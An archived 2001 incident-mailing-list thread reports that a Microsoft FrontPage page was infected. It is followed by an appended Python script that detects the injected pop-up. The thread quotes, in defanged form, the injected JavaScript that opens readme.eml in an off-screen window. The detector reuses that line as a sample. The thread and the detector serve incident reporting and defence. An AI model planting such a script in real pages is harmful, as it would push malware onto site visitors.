RE: Please tell me I'm wrong: microsoft.com infected

From: Ken Pfeil (Kenat_private)
Date: Wed Sep 19 2001 - 15:27:51 PDT

    Must have been 207.46.230.218 'cause it's offline now.
    
    > -----Original Message-----
    > From: Ken Pfeil [mailto:Kenat_private]
    > Sent: Wednesday, September 19, 2001 6:26 PM
    > To: Michael H. Warfield; Steve Cody
    > Cc: incidentsat_private
    > Subject: RE: Please tell me I'm wrong: microsoft.com infected
    >
    >
    > Which system?
    >
    > Canonical name: www.microsoft.akadns.net
    > Aliases:
    >   www.microsoft.com
    > Addresses:
    >   207.46.230.218
    >   207.46.197.102
    >   207.46.197.100
    >   207.46.230.220
    >
    > > -----Original Message-----
    > > From: Michael H. Warfield [mailto:mhwat_private]
    > > Sent: Wednesday, September 19, 2001 5:54 PM
    > > To: Steve Cody
    > > Cc: incidentsat_private
    > > Subject: Re: Please tell me I'm wrong: microsoft.com infected
    > >
    > >
    > > On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
    > > > I just went to http://www.microsoft.com/frontpage, and my Symantec
    > > > Norton Antivirus popped up and denied access to readme.eml.
    > >
    > > > I could not view the source of the loaded page, so I can't verify that
    > > > it is definitely infected.
    > >
    > > 	Yes, indeedie do.  Just did a wget http://www.microsoft.com/frontpage
    > > and here is what's on da bottom:
    > >
    > > [html][script language="JavaScript"]window.open("readme.eml",
    > > null, "resizable=no,top=6000,left=6000")[/script][/html]
    > >
    > > 	Defanged by turning angle brackets into square brackets even though
    > > it's not in an html attachment.  ;-)
    > >
    > > > Steve
    > > >
    > > >
    > > >
    > > > ----------------------------------------------------------------------------
    > > > This list is provided by the SecurityFocus ARIS analyzer service.
    > > > For more information on this free incident handling, management
    > > > and tracking system please see: http://aris.securityfocus.com
    > >
    > > --
    > >  Michael H. Warfield    |  (770) 985-6132   |  mhwat_private
    > >   (The Mad Wizard)      |  (678) 463-0932   |  http://www.wittsend.com/mhw/
    > >   NIC whois:  MHW9      |  An optimist believes we live in the best of all
    > >  PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
    >
    >
    
    



    This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:37:54 PDT
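
A defender-side check for the page tampering reported in this thread, as an added example that is not part of the original messages: it scans fetched HTML for a script block that calls window.open() on a .eml file and reports whether the block sits after the document's closing html tag, as in the wget output quoted above. The function name, the sample pages and the 3000-pixel off-screen threshold are assumptions.

```python
import re

# Accept real angle brackets and the square-bracket defanged form from the post.
O, C = r'[<\[]', r'[>\]]'
SCRIPT_RE = re.compile(O + r'script\b[^>\]]*' + C + r'(.*?)' + O + r'/script\s*' + C,
                       re.IGNORECASE | re.DOTALL)
HTML_END_RE = re.compile(O + r'/html\s*' + C, re.IGNORECASE)
# window.open("<something>.eml", <name>, "<features>")
POPUP_RE = re.compile(
    r'window\.open\(\s*["\']([^"\']+\.eml)["\']\s*'
    r'(?:,[^,)]*(?:,\s*["\']([^"\']*)["\'])?)?',
    re.IGNORECASE)
COORD_RE = re.compile(r'\b(top|left)\s*=\s*(\d+)', re.IGNORECASE)
OFFSCREEN_PX = 3000  # assumed threshold, not taken from the thread


def find_eml_popups(page):
    """Return one finding per script block that opens a .eml file."""
    end = HTML_END_RE.search(page)
    findings = []
    for script in SCRIPT_RE.finditer(page):
        popup = POPUP_RE.search(script.group(1))
        if not popup:
            continue
        features = popup.group(2) or ""
        coords = {k.lower(): int(v) for k, v in COORD_RE.findall(features)}
        findings.append({
            "target": popup.group(1),
            # True when the script begins after the first closing html tag.
            "appended": bool(end) and script.start() > end.start(),
            # True when the window is positioned far outside a normal screen.
            "offscreen": any(v >= OFFSCREEN_PX for v in coords.values()),
        })
    return findings


# Constructed samples; the appended block reuses the defanged form quoted in the thread.
CLEAN = '<html><body><script>window.open("help.html")</script></body></html>'
TAMPERED = ('<html><body>FrontPage</body></html>\n'
            '[html][script language="JavaScript"]window.open("readme.eml",\n'
            'null, "resizable=no,top=6000,left=6000")[/script][/html]')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, find_eml_popups(page))
```
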